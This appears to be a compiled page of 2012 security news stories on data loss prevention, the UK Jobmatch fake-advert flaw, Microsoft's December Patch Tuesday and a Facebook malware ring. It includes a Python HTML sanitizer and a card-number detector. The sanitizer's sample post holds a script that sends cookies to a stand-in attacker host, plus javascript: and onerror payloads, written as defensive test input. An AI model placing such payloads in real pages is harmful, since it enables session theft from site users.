About a year and a half ago, Mark Jackson, the information security officer at San Rafael, Calif.-based Westamerica Bank, began researching data loss prevention products for the regional community bank. His search began after a Department of Financial Institutions auditor recommended the technology as a way for Westamerica Bank to manage insider threats.
UK job search website vulnerability allows unchecked job postings
Hackers have obtained personal details of more than 70 job applicants by exploiting a flaw in the U.K. government's Universal Jobmatch website. According to U.K. television station Channel 4 News, security checks are not performed on the people who post jobs, and job advertisements go unchecked as well.
A group of hackers seeking to draw attention to the security flaws used clearly false information to register as employers. They then posted a fake advertisement for a cleaning job to the site. Applicants for the job handed over highly sensitive personal details, including national insurance numbers, email addresses, dates of birth, personal addresses and scans of passports. Hackers who are able to collect these kinds of information could easily commit identity fraud, or illegally access applicants' email, bank accounts and other online accounts.
Channel 4 investigators were also able to register to the site within minutes. They have notified the U.K.'s privacy watchdog, the Information Commissioner's Office, of the problem.
User-generated content on forums and other websites has been a growing concern. Basic website security controls scan contributed user content for invalid URLs, malware and malicious script that can cause serious problems. Research issued in May by security firm Imperva highlighted the dangers of user-generated content. Many social media sites run PHP, a common Web development language; PHP applications that fail to validate and encode user-supplied input are a frequent source of exactly these vulnerabilities.
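The paragraph above describes the basic control that was apparently missing: screening contributed content for unsafe URLs and script before it is published. As an added illustration, not code from the article or from the Jobmatch site, the following allowlist sanitizer rebuilds a submitted advert body from a small set of permitted tags, strips `<script>` elements with their contents, drops every `on*` event handler, and keeps `href` only when it is an absolute http(s) link. The tag allowlist, the function names and the sample advert are assumptions constructed for this example.

```python
from html import escape
from html.parser import HTMLParser
from urllib.parse import urlparse

# Allowlist: anything not named here is dropped, which is safer than trying to
# enumerate every dangerous tag or attribute (assumed policy for this example).
ALLOWED_TAGS = {"p", "br", "b", "i", "em", "strong", "ul", "ol", "li", "a"}
ALLOWED_ATTRS = {"a": {"href"}}
DROP_WITH_CONTENT = {"script", "style"}   # remove the element and everything inside it
VOID_TAGS = {"br"}


def safe_url(value):
    """Accept only absolute http(s) links; rejects javascript:, data:, scheme-relative and empty hrefs."""
    if not value:
        return False
    parsed = urlparse(value.strip())      # urlparse lowercases the scheme for us
    return parsed.scheme in ("http", "https") and bool(parsed.netloc)


class PostSanitizer(HTMLParser):
    """Rebuilds submitted HTML from the allowlist, recording what was thrown away."""

    def __init__(self):
        super().__init__(convert_charrefs=True)
        self.out = []
        self.skip_depth = 0      # >0 while inside a <script>/<style> element
        self.rejected = []       # audit trail for a moderation queue

    def handle_starttag(self, tag, attrs):
        if tag in DROP_WITH_CONTENT:
            self.skip_depth += 1
            self.rejected.append(f"<{tag}> element removed")
            return
        if self.skip_depth:
            return
        if tag not in ALLOWED_TAGS:
            self.rejected.append(f"<{tag}> tag removed")
            return
        kept = []
        for name, value in attrs:
            if name.startswith("on"):                       # event handlers never pass
                self.rejected.append(f"{tag}[{name}] event handler removed")
            elif name not in ALLOWED_ATTRS.get(tag, set()):
                continue                                    # silently drop e.g. style=, id=
            elif name == "href" and not safe_url(value):
                self.rejected.append(f"{tag}[href] unsafe URL removed: {value!r}")
            else:
                kept.append(f' {name}="{escape(value, quote=True)}"')
        self.out.append(f"<{tag}{''.join(kept)}>")

    def handle_endtag(self, tag):
        if tag in DROP_WITH_CONTENT:
            self.skip_depth = max(0, self.skip_depth - 1)
        elif not self.skip_depth and tag in ALLOWED_TAGS and tag not in VOID_TAGS:
            self.out.append(f"</{tag}>")

    def handle_data(self, data):
        if not self.skip_depth:
            self.out.append(escape(data))   # re-encode text so it cannot be re-read as markup


def sanitize(submitted_html):
    """Return (clean_html, rejected_items) for a user-submitted advert body."""
    parser = PostSanitizer()
    parser.feed(submitted_html)
    parser.close()
    return "".join(parser.out), parser.rejected


# Constructed sample of a hostile advert; not taken from any real site.
SAMPLE_POST = (
    "<p>Cleaner wanted, <b>9 GBP/hr</b>.</p>"
    '<script>document.location="http://evil.example/?c="+document.cookie</script>'
    '<p>Apply <a href="javascript:alert(1)" onclick="steal()">here</a> or '
    '<a href="https://employer.example/apply">on our site</a>.</p>'
    '<img src=x onerror="alert(1)">'
)

if __name__ == "__main__":
    clean, rejected = sanitize(SAMPLE_POST)
    print(clean)
    for item in rejected:
        print("rejected:", item)
```

The rejected list is the useful by-product: an advert that arrives with inline script and javascript: links is a signal about the poster, not just about the markup, and can feed the same review queue that checks employer registrations.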
In a statement about the Jobmatch website, the U.K. Department of Work and Pensions said:
"The site clearly advises jobseekers not to give out personal details like bank accounts or National Insurance numbers until a job offer's been made. Anybody seeking to acquire personal data by publishing fake job adverts should be aware this is potentially an attempt to commit fraud and that is a criminal offence.
"The security of a claimant's data is of the utmost importance to us and we have a number of checks in place when employers register to use the site. Sadly, there will always be a small number of cases where people seek to get around these checks. If someone is being asked for personal information or details beyond their CV [curriculum vitae] we would recommend they alert Jobcentre Plus immediately."
The Universal Jobmatch website can be accessed via the U.K. government portal gov.uk. It was launched on Nov. 19 as a replacement for the Jobcentre Plus website, which Channel 4 News exposed as being vulnerable to fraudsters in 2011.
Internet Explorer vulnerabilities fixed in December 2012 Patch Tuesday
Microsoft released five critical security bulletins, fixing coding errors in Internet Explorer (IE) and Microsoft Word. The IE flaws are present in all versions of the browser but are not being exploited in the wild; for versions before IE 9, the update is a defense-in-depth change only.
The software giant's last scheduled round of updates for 2012 included seven bulletins in Microsoft's December 2012 Patch Tuesday, repairing a total of 12 vulnerabilities across its product set.
Patching experts say the IE vulnerabilities, addressed in MS12-077, should be some of the first that companies address. The security update is critical for IE 9 and 10, and has no severity rating for IE 6, 7 and 8. The most severe vulnerabilities could allow remote code execution. A successful attacker could gain the same rights as the current user. Paul Henry, security and forensic analyst at Lumension Security Inc., in Scottsdale, Ariz., said the popularity of IE makes this patch an important one for businesses.
MS12-079 is another critical bulletin that should be a high priority for businesses. This bulletin patches a vulnerability in Microsoft Word that could allow remote code execution if a user opens a specially crafted Rich Text Format (RTF) file using a flawed version of Microsoft Office software, or previews or opens a specially crafted RTF email message in Outlook while using Microsoft Word as the email viewer.
Amol Sarwate, director of vulnerability research at Redwood City, Calif.-based Qualys Inc., said Word vulnerabilities are usually only rated Important, however, Microsoft made it a critical update because Word is the default preview method for email attachments in Outlook.
MS12-079 affects Microsoft Word 2003, 2007 and 2010, and all supported versions of Microsoft Word Viewer, Microsoft Office Compatibility Pack, and Microsoft Office Web Apps. It may require a restart.
MS12-078 is a critical security bulletin that requires a restart. It fixes vulnerabilities in Windows Kernel-Mode Drivers that could allow remote code execution if a user opens a specially crafted document or visits a malicious webpage that embeds TrueType or OpenType font files. The vulnerabilities affect all supported releases of Microsoft Windows.
MS12-080, which may require a restart, fixes vulnerabilities in Microsoft Exchange Server 2007 and 2010; the most severe is in Microsoft Exchange Server WebReady Document Viewing. These vulnerabilities could allow remote code execution if a user previews a specially crafted file using Outlook Web App. Businesses using Exchange should pay attention to this bulletin, said Wolfgang Kandek, CTO at Qualys.
The final critical bulletin is MS12-081, which addresses a vulnerability in the Windows File Handling Component that could allow remote code execution. It requires a restart. The affected software is Windows XP, Windows Server 2003, Windows Vista, Windows Server 2008, Windows 7, and Windows Server 2008 R2.
The two important bulletins, MS12-082 and MS12-083, require a restart. MS12-082 fixes a vulnerability in DirectPlay that could allow remote code execution. The vulnerability is present in all supported versions of Microsoft Windows except Windows RT. MS12-083 fixes a vulnerability in IP-HTTPS that could allow security feature bypass. It impacts all supported editions of Windows Server 2008 R2 and Windows Server 2012.
Microsoft also released an update to Security Advisory 2755801, which fixes vulnerabilities in Adobe Flash Player in IE 10. The advisory is in conjunction with a critical update to Flash Player issued today by Adobe.
Microsoft bulletins decline in 2012
Microsoft said its last Patch Tuesday of 2012 marks a year with an overall decline in security bulletins, something Lumension's Henry attributes to Microsoft's secure coding initiative.
"Most of the updates [this year] have been with legacy code," Henry said.
There were 83 bulletins in 2012, 100 in 2011 and 106 in 2010. Henry also pointed out that the number of patches each month has evened out. This year, every month except September had 6-9 bulletins. In contrast, 2011 saw the totals go up and down on a monthly basis. This turn to greater consistency has helped IT teams better prepare for Patch Tuesday.
Lessons learned from real-world DLP technology deployments
Despite all of the security technologies -- compliance with government and industry regulations, and employee awareness training -- it's impossible to save workers from themselves. As they access, use and share their data they often make mistakes that can cause serious data breaches. They'll email confidential files to their systems at home; they'll inadvertently save unencrypted, regulated data on the network somewhere; and they'll make tons of other mistakes every day that place confidential data at risk, or use it in ways that violate security policy.
DLP is just a tool; it just tells you where your areas of risk are.
Charles Lee,
regional information security officer, Providence Health & Services
Johnny Matamoros, information security manager at Freeman Decorating Co., based in Dallas, Texas, knows these challenges. The IT team at Freeman Decorating took the right steps to better secure data. They separated their network into segments, including the portion that handled credit card data, and they provided ways for workers to encrypt email. But they didn't have an effective way to spot potential data leaks as they happened, Matamoros explained.
"We did not have an effective solution, or process in place, to consistently monitor, identify, alert and report on when specific data types enter or leave the organization. In our case, the [pressing] data type was credit card information," Matamoros said.
To quickly identify such incidents, Matamoros deployed McAfee Data Loss Prevention (DLP). But that deployment, while a success, wasn't without its own set of hurdles and lessons learned. And while many organizations that have deployed DLP technology report a certain amount of success in limiting data loss, it's not always easy getting to that point.
To gain an understanding of the most common lessons learned from real-world DLP installations, we've interviewed a number of experts who are either deeply familiar with the DLP market, or security managers who've successfully implemented DLP. Here's the advice they had to share:
Your own data governance maturity matters as much as, if not more than, the technology. In fact, Rich Mogull, analyst and CEO at the Phoenix-based IT security market research firm Securosis, said the technology, which most often works as expected, isn't the number one inhibitor to successful DLP technology deployments: "If DLP implementations are going to work, you have to be mature as an organization about your data. Organizations have to have a good sense of where their data is and how to protect it. And starting from the beginning and identifying the data that is important to protect and where it resides is difficult, and it's a lot of work," Mogull said.
DLP technology deployments: Going too far, too fast
Another common theme among failed deployments is going too far, too fast with the data screened and controlled by DLP. "You'll run into a significant false-positive issue if you do so," said Scott Crawford, research director at Enterprise Management Associates.
"There are potential issues when it comes to how much data you are collecting, and how much of that data is relevant? And what is your false-positive hit-rate looking like? You need to plan to allocate resources to tune your deployment," Crawford explained.
"Initially, go for the quick wins. Take a high-level view of your environment by turning on a group of rules, but don't worry about enforcing those policies. You just use it as a way of finding, at a high level, where as much stuff is as you can. Consider it a risk assessment to find your biggest problem areas," Mogull said.
Crawford agreed with aiming for digestible, quick wins. "That will include data with a high structure and high recognizability. These will provide the easiest hits with the fewest false positives," Crawford added. That typically means starting with account data that conforms to a specific format, such as account numbers, Social Security numbers, credit card data and similarly structured information. "Where it starts to get a little fuzzy is in unstructured data, like intellectual property, that requires its own attention, and that is where classification becomes more important," Crawford said.
Failure to plan for ongoing system response and tuning
As you start looking for data, you need to be prepared to be potentially deluged with the amount of data, varying types of data, sources of data transmissions, as well as the content of the data itself, Matamoros explained. "[Preparing for] the content of the data is not to be taken lightly, as you never know what you may capture. In addition, you really should be clear on the type of data you want to monitor and the action you want performed when the data is seen by the DLP," he added. "Even with proper data types identified, be prepared to spend some time tuning for false positives based on your individual organization," Matamoros said.
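Crawford's advice to start with highly structured data, and Matamoros's warning that even well-chosen data types need tuning for false positives, come together in the simplest DLP rule there is: a credit card number detector. As an added example, not code from the article or from any of the products named in it, the block below runs a two-stage rule over constructed sample messages: a cheap pattern finds 13- to 16-digit runs, then a Luhn check discards the runs that cannot be card numbers, and a before/after count shows how much noise that one tuning step removes. The sample messages, function names and masking format are assumptions for this example; the card-like numbers are standard payment-network test numbers or deliberately invalid strings.

```python
import re

# Constructed sample messages standing in for the outbound mail or web traffic a
# network DLP sensor captures. None of the numbers is a real account number.
SAMPLE_MESSAGES = [
    "Order confirmation: card 4111 1111 1111 1111 exp 12/14",  # passes Luhn
    "Ticket #4111111111111112 escalated to tier 2",            # 16 digits, fails Luhn
    "Invoice 5500 0000 0000 0004 paid in full",                # passes Luhn
    "Tracking 1234567812345678 shipped via ground",            # 16 digits, fails Luhn
    "Please call 555-0100 about the Q3 report",                # too short to be a PAN
]

# Stage 1: a cheap pattern for 13- to 16-digit runs with optional space or dash
# separators, bounded so it does not fire inside longer digit strings.
CANDIDATE = re.compile(r"(?<![\d-])(?:\d[ -]?){12,15}\d(?![\d-])")


def luhn_ok(digits: str) -> bool:
    """Stage 2: the Luhn check digit every payment card number satisfies.

    A random digit run passes it about one time in ten, so this single check
    removes most of the false positives the raw pattern produces.
    """
    total = 0
    for i, ch in enumerate(reversed(digits)):
        d = int(ch)
        if i % 2 == 1:          # double every second digit from the right
            d *= 2
            if d > 9:
                d -= 9
        total += d
    return total % 10 == 0


def mask(digits: str) -> str:
    """Keep first and last four digits so the alert is usable without re-leaking the number."""
    return digits[:4] + "*" * (len(digits) - 8) + digits[-4:]


def scan(messages, require_luhn=True):
    """Return (message_index, masked_number) for every candidate that survives the filters."""
    findings = []
    for idx, msg in enumerate(messages):
        for match in CANDIDATE.finditer(msg):
            digits = re.sub(r"[ -]", "", match.group())
            if require_luhn and not luhn_ok(digits):
                continue        # tuned out: would have been a false positive
            findings.append((idx, mask(digits)))
    return findings


def false_positive_reduction(messages):
    """Hit counts before and after the Luhn stage, the figure you report when tuning."""
    raw = len(scan(messages, require_luhn=False))
    tuned = len(scan(messages, require_luhn=True))
    return raw, tuned


if __name__ == "__main__":
    for idx, masked in scan(SAMPLE_MESSAGES):
        print(f"ALERT message {idx}: possible card number {masked}")
    print("candidates before/after Luhn:", false_positive_reduction(SAMPLE_MESSAGES))
```

On the constructed sample the raw pattern fires four times and the Luhn stage keeps two. In a real deployment the next tuning steps are the ones the interviewees describe: restricting the rule to the network segment that actually carries card data, deciding up front whether a hit alerts or blocks, and naming who is paged when it does.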
DLP is a technological "solution." A few years ago, Renton, Washington-based hospital and health care services provider Providence Health & Services set out to ensure confidential data such as patient, employee and partner-sensitive information wasn't being transmitted insecurely, said Charles Lee, regional information security officer at Providence. But it's not just the ability to detect confidential data potentially leaking on the network that turns out to be the real, long-term win, Lee explained. "DLP is just a tool; it just tells you where your areas of risks are," he said. "The real win, in my opinion, is the opportunity it creates to bring awareness and training to your users," he added.
According to Lee, as Providence has steadily improved its DLP implementation, every time a user triggers a DLP event, it's a training opportunity. "They get coached and trained on proper ways of handling information. There are also opportunities to improve bad, unsecured business processes that are discovered," he said. "DLP is not a deploy-and-forget technology, it can actually provide opportunities to improve employee and business security workflow," he said.
Not running a proof-of-concept deployment
To get started on the right foot, Freeman Decorating's Matamoros suggested starting with a manageable proof-of-concept.
"It's very important to get buy-in from management and agreement of not only which capture filters to enable, but also what actions to take and who to contact, should you see any filters triggered. In addition, you should properly identify a network location that will provide the data you are interested in monitoring," he said. "Once you begin monitoring, be prepared for the results. This could be overwhelming, initially," he said.
About the author:
George V. Hulme writes about security and technology from his home in Minneapolis. You can also find him tweeting about those topics on Twitter at @georgevhulme.
Social engineering, employee gaffes require full attention, says expert
Companies often rely too heavily on security technologies and ignore the impact a "human firewall" can have on security, explains noted software security expert Hugh Thompson. In an interview with SearchSecurity.com, Thompson explains that social engineering attacks have made it extremely difficult for employees to weed out legitimate messages from those designed to trick users into giving up sensitive data.
FBI arrests attackers associated with Facebook cybercrime ring
The FBI has arrested 10 people in association with an international cybercrime ring suspected of spreading malware via Facebook and stealing more than $850 million using compromised bank account credentials and credit card data.
The arrests were made with the assistance of Facebook's IT security team, which tracked down the individuals and helped people whose machines were infected with the malware. The cybercriminal gang used the Butterfly Botnet to spread malware and is believed to have made most of its gains through Facebook.
The suspects are from Bosnia and Herzegovina, Croatia, Macedonia, New Zealand, Peru, the United Kingdom, and the United States. The FBI said the individuals ran the Yahos malicious software, which is linked to more than 11 million infections.
"Yahos targeted Facebook users from 2010 to October 2012, and security systems were able to detect affected accounts and provide tools to remove these threats," the FBI said in a statement.
Facebook, Twitter and other social networks have beefed up Web security as cybercriminals take a growing interest in targeting their users. Experts say users have a high level of trust in the social networks, often clicking on shared links without considering the security ramifications.
Facebook was hit by the Ramnit worm in August, enabling attackers to steal user account passwords. The Koobface worm has also spread via the social network for a number of years. Facebook has partnered with McAfee to boost security and has implemented brute-force password protection. It also monitors all user accounts for anomalous activity, suspending accounts that it suspects are fraudulent or have been taken over by attackers.